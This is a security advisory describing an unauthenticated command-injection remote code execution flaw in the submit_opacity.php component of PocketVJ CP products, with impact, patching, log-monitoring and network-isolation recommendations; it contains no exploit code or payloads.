A critical vulnerability has been discovered in multiple PocketVJ CP products, allowing an unauthenticated attacker to execute arbitrary code remotely. This flaw, with a CVSS score of 9.8, enables a complete takeover of the affected device without requiring any user credentials. Successful exploitation could lead to service disruption, data theft, and further attacks on the internal network.

This is an unauthenticated remote code execution (RCE) vulnerability located in the submit_opacity.php component. The root cause is the application's failure to properly sanitize user-supplied input submitted to a parameter (e.g., the opacity value). An unauthenticated attacker can send a specially crafted HTTP request to the vulnerable endpoint, injecting malicious shell commands into the parameter. These commands are then executed on the underlying operating system with the privileges of the web server process, allowing the attacker to gain full control over the device.

This vulnerability is rated as critical severity with a CVSS score of 9.8. Exploitation by an attacker could lead to a complete compromise of the affected PocketVJ systems. The potential business impact includes disruption of services controlled by the device, unauthorized access to and exfiltration of sensitive data, and modification of system configurations. A compromised device could also serve as a pivot point for attackers to launch further attacks against other critical systems within the organization's internal network, potentially leading to a wider breach, reputational damage, and significant recovery costs.

Immediate Action: The primary remediation is to update all affected PocketVJ CP products to the latest patched version as recommended by the vendor. After patching, it is crucial to monitor for any signs of exploitation attempts by reviewing system and application access logs for unusual activity targeting the vulnerable component.

Proactive Monitoring: Scrutinize web server access logs for incoming requests to the submit_opacity.php file, specifically looking for malicious payloads or command injection signatures within the request parameters. Monitor for any anomalous outbound network connections from PocketVJ devices, which could indicate a successful compromise. System-level monitoring should be in place to detect unexpected processes, file modifications, or unauthorized user accounts.

Compensating Controls: If immediate patching is not feasible, implement the following controls to reduce risk:

• Restrict network access to the device's web interface, particularly the submit_opacity.php endpoint, to a limited set of trusted administrative IP addresses.
• Deploy a Web Application Firewall (WAF) with rules designed to detect and block command injection attack patterns.
• Segment the network to isolate PocketVJ devices from critical business systems, limiting the potential impact of a compromise.

Public Exploit Available: false

Due to the critical severity (CVSS 9.8) of this unauthenticated remote code execution vulnerability, immediate action is required. Organizations using the affected PocketVJ CP products must prioritize applying the vendor-supplied updates to all vulnerable systems without delay. While this vulnerability is not currently listed on the CISA Known Exploited Vulnerabilities (KEV) catalog, its high impact and potential for exploitation make it a prime candidate for future inclusion. Treat this vulnerability as an active threat and implement the recommended remediation and monitoring steps immediately to prevent system compromise.